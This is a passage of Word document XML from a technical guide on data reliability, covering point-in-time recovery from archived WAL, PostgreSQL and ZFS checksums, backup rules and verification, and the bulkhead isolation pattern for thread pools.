    </w:p>
    <w:p w14:paraId="648033AD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAL archiving and Point-In-Time Recovery (PITR):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254B64EB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>WAL files are </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>archived</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> to object storage (S3, GCS) continuously. Combined with a base backup (periodic full snapshot of data files), you can restore the database to </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>any point in time</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586B4284" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Restore the base backup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E3B62B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Apply archived WAL records from the backup's LSN up to the target recovery point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD05EE6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>This is how cloud databases (AWS RDS, Google Cloud SQL) provide PITR — you request restore to any second in the last 35 days, and the service replays WAL records to reconstruct the exact state at that moment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D557C5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The reliability implication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> PITR means </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data is never truly unrecoverable</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> as long as the WAL archive is intact. An accidental DROP TABLE can be recovered by restoring to the second before it was executed. The archive itself must be reliable — object storage with geographic redundancy and versioning (S3's object versioning protects against accidental archive deletion).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9525F0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Checksums and Data Integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DD4E51" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Silent data corruption</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> is one of the most insidious reliability threats. Disk firmware bugs, cosmic ray bit flips (RAM), network bit errors (rare but non-zero) — all can corrupt data without any error signal from the hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13124302" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The reliability failure mode:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Data is corrupted, written to disk, backed up in the corrupted state, replicated to replicas in the corrupted state. By the time the corruption is discovered (user reports wrong data, application crashes on unexpected value), every copy — primary, replica, backup — contains the corrupted data. Recovery is impossible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA16570" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL data checksums:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BD5EFD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>When enabled, PostgreSQL computes a CRC-32C checksum over each 8KB data page and stores it in the page header. On every page read (from disk or OS page cache), the checksum is recomputed and compared. If they don't match: </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PANIC</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — the database immediately stops rather than serving corrupt data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF1FFEE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>This is the correct reliability behavior — </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>failing loudly on detected corruption</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> is better than silently serving wrong data. The loud failure triggers investigation and recovery from a clean backup, before the corruption spreads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF41624" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The checksum coverage gap:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Checksums protect data on disk. They don't protect data in transit (network). For that: application-level checksums (hash the payload before sending, verify on receipt), TLS MAC (message authentication code verifies payload integrity in transit), and TCP's built-in checksum (weak but catches most bit errors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78024442" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ZFS — End-to-End Data Integrity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A01885F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>ZFS (used by many storage appliances, some database deployments) implements </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>copy-on-write with checksums at every layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> of the storage stack. Unlike PostgreSQL's per-page checksums (which protect against disk corruption but not filesystem bugs), ZFS checksums protect against:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D969AB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Disk corruption (bit rot).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB7B80F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Firmware bugs that write data to wrong locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D09DE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Memory corruption in the storage path (ZFS checksums are stored separately from the data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66104B22" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="368"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Silent data corruption at any layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1F4E1E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>ZFS uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Merkle trees</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (hash trees) over data blocks. The root hash covers the entire dataset. Any corruption anywhere in the tree changes the root hash — immediately detectable. ZFS can also </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>heal</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> corruption when RAID-Z (ZFS's RAID) provides redundant copies — the corrupted block is identified, the correct value is read from the redundant copy, the corrupted copy is rewritten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E04848E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backup Reliability — The 3-2-1 Rule and Beyond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5E0324" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3-2-1 rule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AB67D4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> copies of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BAEB22" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> different storage media types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDB5D40" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> copy offsite (geographically separate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409561A7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>But for production reliability, 3-2-1 is insufficient. The extended model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD011D2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3-2-1-1-0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72486A12" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>3 copies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1A2B00" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>2 different media.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F07F96" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>1 offsite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5B5623" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> offline / air-gapped copy (ransomware cannot reach it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0462D7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="370"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> backup errors (verify backups are valid — the most critical and most overlooked rule).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C50C20D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Backup verification — the most critical reliability practice that most organizations skip:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01312E70" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A backup that has never been tested for restore is not a backup — it's a hope. Backup verification requires:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CF3DA0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Periodic restore tests:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Restore the backup to an isolated environment. Verify the data is present and correct. Measure the restore time (this is your actual RTO, not the theoretical one).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677C1324" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Checksum verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Re-read all backup files and verify checksums match the originals recorded at backup time. Detects silent corruption in the backup storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF74697" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-level validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> After restore, run the application against the restored data. Execute test queries, verify row counts, spot-check critical records. A structurally valid database with semantically corrupt data passes structural validation but fails application validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325BC1A8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="371"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automated restore pipelines:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Manually testing backups is error-prone and skipped under pressure. Automate: after every backup, automatically spin up a restore environment, run validation scripts, alert on failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052129B8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The disaster discovery anti-pattern:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> The worst reliability event is discovering your backup is corrupt </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>during a disaster recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>, when you need it most. Discovering backup corruption during routine testing, when you have time to fix it, is much better.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A2998" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="75FAE662">
          <v:rect id="_x0000_i2786" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A9D70" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Failure Isolation — Containing Blast Radius</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E696C5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reliability requires not just preventing failures but </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>containing them</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — ensuring a failure in one part of the system doesn't cascade through the entire system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E32EF89" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bulkhead Pattern — Deep Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031C5129" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Named after ship bulkheads — watertight compartments that prevent flooding from sinking the entire ship. In software: separate resource pools per dependency, so a failure in one dependency can only consume its allocated resources, not the entire system's resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70624511" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The failure cascade without bulkheads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05009FB5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FB96FC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>All requests share one thread pool (200 threads total)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DBE5CF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="400C331B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Payment Service calls slow DB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1164C8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → Each request blocks a thread waiting for DB response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49541B8E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → All 200 threads gradually fill with blocked Payment requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB1FAB1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → User Profile requests (don't need this DB) arrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EB258D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → No threads available → User Profile requests queue → timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500C767A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → Inventory requests arrive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092A0183" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → No threads available → timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B88B43D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → ALL requests fail, including ones that have nothing to do with the slow DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36776419" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The bulkhead isolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D47E80E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9E13CF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Payment Service thread pool:   50 threads  (dedicated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6AEB47" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>User Profile thread pool:      50 threads  (dedicated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D0DF08" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Inventory thread pool:         50 threads  (dedicated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D090062" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>General thread pool:           50 threads  (shared for everything else)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D609E92" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6"/>
    <w:p w14:paraId="5EB02153" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Payment DB becomes slow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FB68A3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → 50 Payment threads fill up with blocked requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E9F5E1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → Payment Service is degraded</w:t>
      </w:r>
    </w:p>
